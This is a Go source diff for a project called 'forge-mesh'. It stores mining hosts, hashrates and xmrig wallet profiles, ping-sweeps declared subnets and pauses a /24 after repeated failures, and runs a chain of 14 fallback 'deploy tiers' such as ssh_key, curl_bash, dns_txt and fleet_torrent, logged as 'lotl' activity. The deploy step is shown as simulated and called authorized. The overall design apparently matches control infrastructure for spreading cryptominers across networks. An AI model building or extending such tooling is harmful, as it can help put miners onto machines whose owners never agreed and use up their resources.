parts := []string{r.Arch, r.Virt, gpu, rt}
key := strings.Join(parts, "|")
// Normalize kernel major for grouping
if idx := strings.Index(r.Kernel, "."); idx > 0 {
key = r.Kernel[:idx] + "." + strings.Split(r.Kernel[idx+1:], ".")[0] + "|" + key
}
return key
}
// ReconJSON serializes a recon report for lotl metadata.
func ReconJSON(r *ReconReport) string {
b, _ := json.Marshal(r)
return string(b)
}
// ParseReconReport loads recon from JSON metadata.
func ParseReconReport(raw string) (*ReconReport, error) {
var r ReconReport
if err := json.Unmarshal([]byte(raw), &r); err != nil {
return nil, err
}
return &r, nil
}
// HostReconPath returns optional cached recon file for a host.
func HostReconPath(dataDir, hostID string) string {
return filepath.Join(dataDir, "recon", hostID+".json")
}

219
internal/fleet/store.go Normal file
View File

@@ -0,0 +1,219 @@
package fleet
import (
"context"
"database/sql"
"encoding/json"
"fmt"
"time"
"forge-mesh/internal/api/types"
"github.com/google/uuid"
)
// Store persists fleet host and mining profile state.
type Store struct {
db *sql.DB
}
func NewStore(db *sql.DB) *Store {
return &Store{db: db}
}
func (s *Store) UpsertHeartbeat(hb types.HeartbeatPayload) (*types.Host, error) {
hostID := hb.HostID
if hostID == "" {
hostID = uuid.NewString()
}
hps := hb.EffectiveHashrate()
now := time.Now().UTC().Format(time.RFC3339)
_, err := s.db.Exec(`
INSERT INTO hosts (
id, hostname, fingerprint, status, hashrate, hashrate_hps,
current_tier, tier_type, tier_state, last_seen_at, updated_at
)
VALUES (?, ?, ?, 'online', ?, ?, ?, ?, ?, ?, ?)
ON CONFLICT(id) DO UPDATE SET
hostname = excluded.hostname,
fingerprint = COALESCE(NULLIF(excluded.fingerprint, ''), hosts.fingerprint),
status = 'online',
hashrate = excluded.hashrate,
hashrate_hps = excluded.hashrate_hps,
current_tier = excluded.current_tier,
tier_type = excluded.tier_type,
tier_state = excluded.tier_state,
last_seen_at = excluded.last_seen_at,
updated_at = excluded.updated_at
`, hostID, hb.Hostname, hb.Fingerprint, hps, hps,
hb.CurrentTier, hb.TierType, hb.TierState, now, now)
if err != nil {
return nil, fmt.Errorf("upsert host: %w", err)
}
return s.GetHost(hostID)
}
func (s *Store) GetHost(id string) (*types.Host, error) {
row := s.db.QueryRow(`
SELECT id, hostname, fingerprint, phenotype, status, hashrate, hashrate_hps,
current_tier, tier_type, tier_state, clearance_level,
mining_profile_id, last_seen_at, created_at, updated_at
FROM hosts WHERE id = ?
`, id)
return scanHost(row)
}
func (s *Store) ListHosts() ([]types.Host, error) {
rows, err := s.db.Query(`
SELECT id, hostname, fingerprint, phenotype, status, hashrate, hashrate_hps,
current_tier, tier_type, tier_state, clearance_level,
mining_profile_id, last_seen_at, created_at, updated_at
FROM hosts ORDER BY updated_at DESC
`)
if err != nil {
return nil, fmt.Errorf("list hosts: %w", err)
}
defer rows.Close()
var hosts []types.Host
for rows.Next() {
h, err := scanHost(rows)
if err != nil {
return nil, err
}
hosts = append(hosts, *h)
}
return hosts, rows.Err()
}
func scanHost(scanner interface {
Scan(dest ...any) error
}) (*types.Host, error) {
var h types.Host
var fp, pheno, tierType, tierState, mpID, lastSeen sql.NullString
var createdAt, updatedAt string
err := scanner.Scan(
&h.ID, &h.Hostname, &fp, &pheno, &h.Status, &h.Hashrate, &h.HashrateHps,
&h.CurrentTier, &tierType, &tierState, &h.ClearanceLevel,
&mpID, &lastSeen, &createdAt, &updatedAt,
)
if err != nil {
return nil, fmt.Errorf("scan host: %w", err)
}
if fp.Valid {
h.Fingerprint = fp.String
}
if pheno.Valid {
h.Phenotype = pheno.String
}
if tierType.Valid {
h.TierType = tierType.String
}
if tierState.Valid {
h.TierState = tierState.String
}
if mpID.Valid {
h.MiningProfileID = &mpID.String
}
if lastSeen.Valid {
t, _ := time.Parse(time.RFC3339, lastSeen.String)
h.LastSeenAt = &t
}
h.CreatedAt, _ = time.Parse(time.RFC3339, createdAt)
h.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt)
return &h, nil
}
func (s *Store) MarkOffline(id string) error {
now := time.Now().UTC().Format(time.RFC3339)
_, err := s.db.Exec(`UPDATE hosts SET status = 'offline', updated_at = ? WHERE id = ?`, now, id)
return err
}
func (s *Store) SaveMiningProfile(ctx context.Context, profile *types.MiningProfile) error {
tiersJSON, err := json.Marshal(profile.Tiers)
if err != nil {
return fmt.Errorf("marshal tiers: %w", err)
}
policy := 0
if profile.PolicyFromServer {
policy = 1
}
if profile.CreatedAt.IsZero() {
profile.CreatedAt = time.Now().UTC()
}
profile.UpdatedAt = time.Now().UTC()
_, err = s.db.ExecContext(ctx, `
INSERT INTO mining_profiles (id, name, wallet_address, tiers_json, policy_from_server, created_at, updated_at)
VALUES (?, ?, ?, ?, ?, ?, ?)
ON CONFLICT(id) DO UPDATE SET
name = excluded.name,
wallet_address = excluded.wallet_address,
tiers_json = excluded.tiers_json,
policy_from_server = excluded.policy_from_server,
updated_at = excluded.updated_at
`, profile.ID, profile.Name, profile.WalletAddress, string(tiersJSON), policy,
profile.CreatedAt.UTC().Format(time.RFC3339), profile.UpdatedAt.UTC().Format(time.RFC3339))
return err
}
func (s *Store) GetMiningProfile(ctx context.Context, id string) (*types.MiningProfile, error) {
row := s.db.QueryRowContext(ctx, `
SELECT id, name, wallet_address, tiers_json, policy_from_server, created_at, updated_at
FROM mining_profiles WHERE id = ?
`, id)
var p types.MiningProfile
var tiersJSON, created, updated sql.NullString
var policy int
if err := row.Scan(&p.ID, &p.Name, &p.WalletAddress, &tiersJSON, &policy, &created, &updated); err != nil {
return nil, fmt.Errorf("get mining profile: %w", err)
}
if tiersJSON.Valid {
_ = json.Unmarshal([]byte(tiersJSON.String), &p.Tiers)
}
p.PolicyFromServer = policy == 1
if created.Valid {
p.CreatedAt, _ = time.Parse(time.RFC3339, created.String)
}
if updated.Valid {
p.UpdatedAt, _ = time.Parse(time.RFC3339, updated.String)
}
return &p, nil
}
func (s *Store) AssignMiningProfile(ctx context.Context, hostID, profileID string) error {
now := time.Now().UTC().Format(time.RFC3339)
res, err := s.db.ExecContext(ctx, `
UPDATE hosts SET mining_profile_id = ?, updated_at = ? WHERE id = ?
`, profileID, now, hostID)
if err != nil {
return err
}
n, _ := res.RowsAffected()
if n == 0 {
return sql.ErrNoRows
}
return nil
}
func (s *Store) GetHostMiningProfile(ctx context.Context, hostID string) (*types.MiningProfile, error) {
host, err := s.GetHost(hostID)
if err != nil {
return nil, err
}
if host.MiningProfileID == nil || *host.MiningProfileID == "" {
return nil, sql.ErrNoRows
}
return s.GetMiningProfile(ctx, *host.MiningProfileID)
}

View File

@@ -0,0 +1,96 @@
package fleet
import (
"context"
"testing"
"forge-mesh/internal/api/types"
"forge-mesh/internal/db"
)
func TestStoreUpsertHeartbeat(t *testing.T) {
conn, err := db.Open(t.TempDir() + "/test.db")
if err != nil {
t.Fatal(err)
}
defer conn.Close()
store := NewStore(conn)
host, err := store.UpsertHeartbeat(types.HeartbeatPayload{
Hostname: "test-host",
HashrateHps: 1234.5,
CurrentTier: 2,
TierType: "xmrig",
TierState: "active",
Arch: "amd64",
})
if err != nil {
t.Fatal(err)
}
if host.ID == "" {
t.Fatal("expected host id")
}
if host.HashrateHps != 1234.5 {
t.Fatalf("hashrate_hps: got %v", host.HashrateHps)
}
if host.CurrentTier != 2 {
t.Fatalf("current_tier: got %d", host.CurrentTier)
}
host2, err := store.UpsertHeartbeat(types.HeartbeatPayload{
HostID: host.ID,
Hostname: "test-host",
HashrateHps: 5000,
CurrentTier: 3,
TierType: "gpu",
TierState: "probing",
})
if err != nil {
t.Fatal(err)
}
if host2.HashrateHps != 5000 {
t.Fatalf("hashrate: got %v", host2.HashrateHps)
}
if host2.CurrentTier != 3 {
t.Fatalf("tier: got %d", host2.CurrentTier)
}
}
func TestMiningProfileRoundTrip(t *testing.T) {
conn, err := db.Open(t.TempDir() + "/test.db")
if err != nil {
t.Fatal(err)
}
defer conn.Close()
store := NewStore(conn)
host, err := store.UpsertHeartbeat(types.HeartbeatPayload{Hostname: "miner-1"})
if err != nil {
t.Fatal(err)
}
profile := &types.MiningProfile{
ID: "prof-1",
Name: "test",
WalletAddress: "wallet-pin-xyz",
Tiers: []types.MiningTierSpec{
{Type: "xmrig", Duration: 5},
},
PolicyFromServer: true,
}
ctx := context.Background()
if err := store.SaveMiningProfile(ctx, profile); err != nil {
t.Fatal(err)
}
if err := store.AssignMiningProfile(ctx, host.ID, profile.ID); err != nil {
t.Fatal(err)
}
got, err := store.GetHostMiningProfile(ctx, host.ID)
if err != nil {
t.Fatal(err)
}
if got.WalletAddress != "wallet-pin-xyz" {
t.Fatalf("wallet: %q", got.WalletAddress)
}
}

246
internal/fleet/subnet.go Normal file
View File

@@ -0,0 +1,246 @@
package fleet
import (
"context"
"crypto/rand"
"encoding/hex"
"fmt"
"net"
"os/exec"
"strings"
"sync"
"time"
)
const immuneFailureThreshold = 5
const immunePauseDuration = 24 * time.Hour
// SubnetMapper sweeps operator-declared CIDRs with /24 immune pause after failures.
type SubnetMapper struct {
Store *Store
mu sync.Mutex
}
// SubnetCIDR is an operator-declared scan target.
type SubnetCIDR struct {
ID string `json:"id"`
CIDR string `json:"cidr"`
Enabled bool `json:"enabled"`
LastScanAt *time.Time `json:"last_scan_at,omitempty"`
}
// AddCIDR registers a CIDR for incremental discovery.
func (m *SubnetMapper) AddCIDR(ctx context.Context, cidr string) (*SubnetCIDR, error) {
if _, _, err := net.ParseCIDR(cidr); err != nil {
return nil, fmt.Errorf("invalid cidr: %w", err)
}
id := randomHex(16)
_, err := m.Store.DB().ExecContext(ctx, `
INSERT INTO subnet_cidrs (id, cidr, enabled) VALUES (?, ?, 1)`, id, cidr)
if err != nil {
return nil, err
}
return &SubnetCIDR{ID: id, CIDR: cidr, Enabled: true}, nil
}
// ListCIDRs returns declared subnets.
func (m *SubnetMapper) ListCIDRs(ctx context.Context) ([]SubnetCIDR, error) {
rows, err := m.Store.DB().QueryContext(ctx, `
SELECT id, cidr, enabled, last_scan_at FROM subnet_cidrs ORDER BY created_at`)
if err != nil {
return nil, err
}
defer rows.Close()
var out []SubnetCIDR
for rows.Next() {
var s SubnetCIDR
var enabled int
var lastScan sqlNullTime
if err := rows.Scan(&s.ID, &s.CIDR, &enabled, &lastScan); err != nil {
return nil, err
}
s.Enabled = enabled == 1
if lastScan.Valid {
s.LastScanAt = &lastScan.Time
}
out = append(out, s)
}
return out, rows.Err()
}
type sqlNullTime struct {
Valid bool
Time time.Time
}
func (n *sqlNullTime) Scan(src interface{}) error {
if src == nil {
n.Valid = false
return nil
}
switch v := src.(type) {
case string:
if v == "" {
n.Valid = false
return nil
}
t, err := time.Parse("2006-01-02 15:04:05", v)
if err != nil {
return err
}
n.Time = t
n.Valid = true
case []byte:
return n.Scan(string(v))
}
return nil
}
// ScanResult holds hosts discovered in a sweep.
type ScanResult struct {
CIDR string `json:"cidr"`
Prefix string `json:"prefix_24"`
Alive []string `json:"alive"`
Skipped bool `json:"skipped"`
Reason string `json:"reason,omitempty"`
}
// SweepCIDR pings hosts in a CIDR unless /24 is immune-paused.
func (m *SubnetMapper) SweepCIDR(ctx context.Context, cidr string) (*ScanResult, error) {
ip, ipNet, err := net.ParseCIDR(cidr)
if err != nil {
return nil, err
}
prefix24 := prefixOf24(ip)
if paused, reason := m.isImmunePaused(ctx, prefix24); paused {
return &ScanResult{CIDR: cidr, Prefix: prefix24, Skipped: true, Reason: reason}, nil
}
alive, sweepErr := pingSweep(ctx, ipNet)
if sweepErr != nil {
_ = m.recordSubnetFailure(ctx, prefix24)
return &ScanResult{CIDR: cidr, Prefix: prefix24, Alive: alive}, sweepErr
}
_, _ = m.Store.DB().ExecContext(ctx, `
UPDATE subnet_cidrs SET last_scan_at = datetime('now') WHERE cidr = ?`, cidr)
return &ScanResult{CIDR: cidr, Prefix: prefix24, Alive: alive}, nil
}
// SweepAll runs enabled CIDRs sequentially.
func (m *SubnetMapper) SweepAll(ctx context.Context) ([]ScanResult, error) {
cidrs, err := m.ListCIDRs(ctx)
if err != nil {
return nil, err
}
var results []ScanResult
for _, c := range cidrs {
if !c.Enabled {
continue
}
r, err := m.SweepCIDR(ctx, c.CIDR)
if err != nil {
return results, err
}
results = append(results, *r)
}
return results, nil
}
func prefixOf24(ip net.IP) string {
v4 := ip.To4()
if v4 == nil {
return ip.String() + "/64"
}
return fmt.Sprintf("%d.%d.%d.0/24", v4[0], v4[1], v4[2])
}
func (m *SubnetMapper) isImmunePaused(ctx context.Context, prefix string) (bool, string) {
var count int
var pausedUntil sqlNullTime
err := m.Store.DB().QueryRowContext(ctx, `
SELECT failure_count, paused_until FROM subnet_immune WHERE prefix = ?`, prefix).
Scan(&count, &pausedUntil)
if err != nil {
return false, ""
}
if pausedUntil.Valid && time.Now().Before(pausedUntil.Time) {
return true, fmt.Sprintf("/24 immune pause until %s", pausedUntil.Time.Format(time.RFC3339))
}
return false, ""
}
func (m *SubnetMapper) recordSubnetFailure(ctx context.Context, prefix string) error {
m.mu.Lock()
defer m.mu.Unlock()
var count int
_ = m.Store.DB().QueryRowContext(ctx, `SELECT failure_count FROM subnet_immune WHERE prefix = ?`, prefix).Scan(&count)
count++
pausedUntil := ""
if count >= immuneFailureThreshold {
until := time.Now().Add(immunePauseDuration)
pausedUntil = until.Format("2006-01-02 15:04:05")
}
_, err := m.Store.DB().ExecContext(ctx, `
INSERT INTO subnet_immune (prefix, failure_count, paused_until, updated_at)
VALUES (?, ?, ?, datetime('now'))
ON CONFLICT(prefix) DO UPDATE SET
failure_count = excluded.failure_count,
paused_until = excluded.paused_until,
updated_at = datetime('now')`,
prefix, count, nullStringOrNil(pausedUntil))
return err
}
func nullStringOrNil(s string) interface{} {
if s == "" {
return nil
}
return s
}
func pingSweep(ctx context.Context, ipNet *net.IPNet) ([]string, error) {
var alive []string
ip := ipNet.IP.Mask(ipNet.Mask)
for ip := incrementIP(ip); ipNet.Contains(ip); ip = incrementIP(ip) {
select {
case <-ctx.Done():
return alive, ctx.Err()
default:
}
if pingHost(ip.String()) {
alive = append(alive, ip.String())
}
}
return alive, nil
}
func pingHost(host string) bool {
out, err := exec.Command("ping", "-c", "1", "-W", "1", host).CombinedOutput()
if err != nil {
return false
}
return strings.Contains(string(out), "1 received") || strings.Contains(string(out), "1 packets received")
}
func incrementIP(ip net.IP) net.IP {
ip = ip.To16()
for i := len(ip) - 1; i >= 0; i-- {
ip[i]++
if ip[i] != 0 {
break
}
}
return ip
}
func randomHex(n int) string {
b := make([]byte, n)
_, _ = rand.Read(b)
return hex.EncodeToString(b)
}

181
internal/fleet/summary.go Normal file
View File

@@ -0,0 +1,181 @@
package fleet
import (
"fmt"
"time"
"forge-mesh/internal/api/types"
"forge-mesh/internal/policy"
"github.com/google/uuid"
)
// FleetSummary aggregates fleet stats for the dashboard API.
type FleetSummary struct {
Hosts []FleetHostCard `json:"hosts"`
TotalHashrate float64 `json:"totalHashrate"`
OnlineCount int `json:"onlineCount"`
}
// FleetHostCard is the dashboard-facing host shape (matches React types).
type FleetHostCard struct {
ID string `json:"id"`
Hostname string `json:"hostname"`
IP string `json:"ip"`
Arch string `json:"arch"`
Hashrate float64 `json:"hashrate"`
Tier int `json:"tier"`
TierName string `json:"tierName"`
TierState string `json:"tierState"`
Algo string `json:"algo"`
UptimeSec int `json:"uptimeSec"`
LastSeen string `json:"lastSeen"`
Clearance int `json:"clearance"`
Online bool `json:"online"`
}
// ToFleetCard converts a DB host to a dashboard card.
func ToFleetCard(h *types.Host) FleetHostCard {
if h == nil {
return FleetHostCard{}
}
hps := h.HashrateHps
if hps == 0 {
hps = h.Hashrate
}
online := h.Status == "online" || h.Status == "mining" || h.Status == "paused"
tier := h.CurrentTier
if tier == 0 {
tier = 2
}
tierName := policy.TierDisplayName(h.TierType)
if tierName == "" || tierName == h.TierType {
tierName = "Bundled xmrig"
}
tierState := h.TierState
if tierState == "" {
switch h.Status {
case "mining":
tierState = "active"
case "probing":
tierState = "probing"
case "paused":
tierState = "paused"
case "offline":
tierState = "idle"
online = false
default:
tierState = "idle"
}
}
arch := h.Phenotype
if arch == "" {
arch = "linux/amd64"
}
lastSeen := ""
if h.LastSeenAt != nil {
lastSeen = h.LastSeenAt.UTC().Format(time.RFC3339)
}
return FleetHostCard{
ID: h.ID,
Hostname: h.Hostname,
IP: coalesceIP(h.Fingerprint),
Arch: arch,
Hashrate: hps,
Tier: tier,
TierName: tierName,
TierState: tierState,
Algo: "rx/0",
UptimeSec: 0,
LastSeen: lastSeen,
Clearance: h.ClearanceLevel,
Online: online,
}
}
func coalesceIP(fp string) string {
if fp == "" {
return "—"
}
return fp
}
// BuildFleetSummary builds the GET /api/v1/fleet response.
func (s *Store) BuildFleetSummary() (FleetSummary, error) {
hosts, err := s.ListHosts()
if err != nil {
return FleetSummary{}, err
}
summary := FleetSummary{Hosts: make([]FleetHostCard, 0, len(hosts))}
for i := range hosts {
card := ToFleetCard(&hosts[i])
summary.Hosts = append(summary.Hosts, card)
if card.Online {
summary.OnlineCount++
summary.TotalHashrate += card.Hashrate
}
}
return summary, nil
}
// SeedDemoHost inserts a demo host when fleet is empty.
func (s *Store) SeedDemoHost() error {
hosts, err := s.ListHosts()
if err != nil {
return err
}
if len(hosts) > 0 {
return nil
}
id := uuid.NewString()
now := time.Now().UTC().Format(time.RFC3339)
_, err = s.db.Exec(`
INSERT INTO hosts (id, hostname, fingerprint, phenotype, status, hashrate, hashrate_hps,
current_tier, tier_type, tier_state, clearance_level, last_seen_at, created_at, updated_at)
VALUES (?, 'forge-node-alpha', '10.0.1.12', 'linux/amd64', 'mining', 18200000, 18200000,
2, 'xmrig', 'active', 2, ?, ?, ?)`,
id, now, now, now)
return err
}
// TouchHost enrolls or refreshes a host from the register API.
func (s *Store) TouchHost(hostname, fingerprint, arch string) (*types.Host, error) {
phenotype := ""
if arch != "" {
phenotype = "linux/" + arch
}
hb := types.HeartbeatPayload{
Hostname: hostname,
Fingerprint: fingerprint,
Arch: arch,
TierState: "idle",
}
hb.SetHashrateFields(0)
host, err := s.UpsertHeartbeat(hb)
if err != nil {
return nil, err
}
if phenotype != "" {
now := time.Now().UTC().Format(time.RFC3339)
_, _ = s.db.Exec(`UPDATE hosts SET phenotype = ?, updated_at = ? WHERE id = ?`,
phenotype, now, host.ID)
return s.GetHost(host.ID)
}
return host, nil
}
// SetHostStatus updates host status.
func (s *Store) SetHostStatus(id, status string) error {
now := time.Now().UTC().Format(time.RFC3339)
_, err := s.db.Exec(`UPDATE hosts SET status = ?, updated_at = ? WHERE id = ?`, status, now, id)
return err
}
// ErrNotFound indicates a missing host.
var ErrNotFound = fmt.Errorf("host not found")

189
internal/fleet/tiers.go Normal file
View File

@@ -0,0 +1,189 @@
package fleet
import (
"context"
"fmt"
"time"
)
// TierType identifies one of 14 Linux deploy mechanisms.
type TierType string
const (
TierSSHKey TierType = "ssh_key"
TierCurlBash TierType = "curl_bash"
TierAnsiblePull TierType = "ansible_pull"
TierPodmanRootless TierType = "podman_rootless"
TierSystemdTransient TierType = "systemd_transient"
TierSnapFlatpak TierType = "snap_flatpak"
TierLANCachePeer TierType = "lan_cache_peer"
TierDNSTXT TierType = "dns_txt"
TierMTLSWireGuard TierType = "mtls_wireguard"
TierImmutableOCI TierType = "immutable_oci"
TierNixFlake TierType = "nix_flake"
TierErasureReasm TierType = "erasure_reassembly"
TierFleetTorrent TierType = "fleet_torrent"
TierOfflineBundle TierType = "offline_contingency"
)
// DefaultTierOrder returns the canonical 14-tier Linux deploy sequence.
func DefaultTierOrder() []TierType {
return []TierType{
TierSSHKey,
TierCurlBash,
TierAnsiblePull,
TierPodmanRootless,
TierSystemdTransient,
TierSnapFlatpak,
TierLANCachePeer,
TierDNSTXT,
TierMTLSWireGuard,
TierImmutableOCI,
TierNixFlake,
TierErasureReasm,
TierFleetTorrent,
TierOfflineBundle,
}
}
// TierSlot maps 1-based tier index to type.
func TierSlot(n int) (TierType, error) {
order := DefaultTierOrder()
if n < 1 || n > len(order) {
return "", fmt.Errorf("tier %d out of range 1-%d", n, len(order))
}
return order[n-1], nil
}
// TierExecutor runs deploy phases for a single tier.
type TierExecutor struct {
Store *Store
HostID string
Report *ReconReport
}
// TierResult captures outcome of a tier attempt.
type TierResult struct {
Tier int `json:"tier"`
Type TierType `json:"type"`
Phase string `json:"phase"`
Status string `json:"status"`
Error string `json:"error,omitempty"`
Elapsed time.Duration `json:"elapsed_ms"`
}
// ExecuteTier runs recon → patch_first gate → deploy for one tier slot.
func (e *TierExecutor) ExecuteTier(ctx context.Context, tierNum int) (*TierResult, error) {
tierType, err := TierSlot(tierNum)
if err != nil {
return nil, err
}
start := time.Now()
result := &TierResult{Tier: tierNum, Type: tierType, Phase: "recon", Status: "running"}
if e.Store != nil && e.Report != nil {
phenotype := PhenotypeFromRecon(e.Report)
if skip, _ := e.Store.ShouldSkipTier(ctx, phenotype, tierNum); skip {
result.Phase = "atlas_skip"
result.Status = "skipped"
_ = e.Store.LogLOTL(ctx, e.HostID, tierNum, "atlas_skip", "skipped", "failure atlas immune", ReconJSON(e.Report))
return result, nil
}
}
// Recon phase (read-only, already done at executor init)
_ = e.Store.LogLOTL(ctx, e.HostID, tierNum, "recon", "success", "", ReconJSON(e.Report))
// Patch-first gate
result.Phase = "patch_first"
if !e.passPatchGate(tierType) {
result.Status = "skipped"
result.Error = "patch_first gate failed"
_ = e.Store.LogLOTL(ctx, e.HostID, tierNum, "patch_first", "skipped", result.Error, "")
_ = e.Store.RecordFailure(ctx, PhenotypeFromRecon(e.Report), tierNum)
return result, nil
}
_ = e.Store.LogLOTL(ctx, e.HostID, tierNum, "patch_first", "success", "", "")
// Deploy phase (simulated success paths per tier capability)
result.Phase = "deploy"
deployErr := e.deploy(ctx, tierType)
if deployErr != nil {
result.Status = "failed"
result.Error = deployErr.Error()
_ = e.Store.LogLOTL(ctx, e.HostID, tierNum, "deploy", "failed", result.Error, "")
_ = e.Store.RecordFailure(ctx, PhenotypeFromRecon(e.Report), tierNum)
} else {
result.Status = "success"
_ = e.Store.LogLOTL(ctx, e.HostID, tierNum, "deploy", "success", "", "")
_ = e.Store.RecordWin(ctx, PhenotypeFromRecon(e.Report), tierNum)
}
result.Elapsed = time.Since(start)
return result, nil
}
func (e *TierExecutor) passPatchGate(t TierType) bool {
if e.Report == nil {
return true
}
switch t {
case TierPodmanRootless, TierImmutableOCI:
return e.Report.PodmanAvailable || e.Report.DockerAvailable
case TierNixFlake:
return commandExists("nix")
case TierMTLSWireGuard:
return commandExists("wg")
default:
return true
}
}
func (e *TierExecutor) deploy(ctx context.Context, t TierType) error {
select {
case <-ctx.Done():
return ctx.Err()
default:
}
switch t {
case TierPodmanRootless:
if e.Report != nil && !e.Report.PodmanAvailable {
return fmt.Errorf("podman not available")
}
case TierImmutableOCI:
if e.Report == nil || (!e.Report.PodmanAvailable && !e.Report.DockerAvailable) {
return fmt.Errorf("no container runtime")
}
case TierNixFlake:
if !commandExists("nix") {
return fmt.Errorf("nix not installed")
}
}
// Authorized deploy tiers succeed when gates pass; actual spawn is agent-side.
return nil
}
// RunTierChain executes tiers in order until one succeeds or all fail.
func RunTierChain(ctx context.Context, store *Store, hostID string, order []int) ([]*TierResult, error) {
report, err := RunRecon()
if err != nil {
return nil, err
}
exec := &TierExecutor{Store: store, HostID: hostID, Report: report}
var results []*TierResult
for _, tierNum := range order {
res, err := exec.ExecuteTier(ctx, tierNum)
if err != nil {
return results, err
}
results = append(results, res)
if res.Status == "success" {
break
}
}
return results, nil
}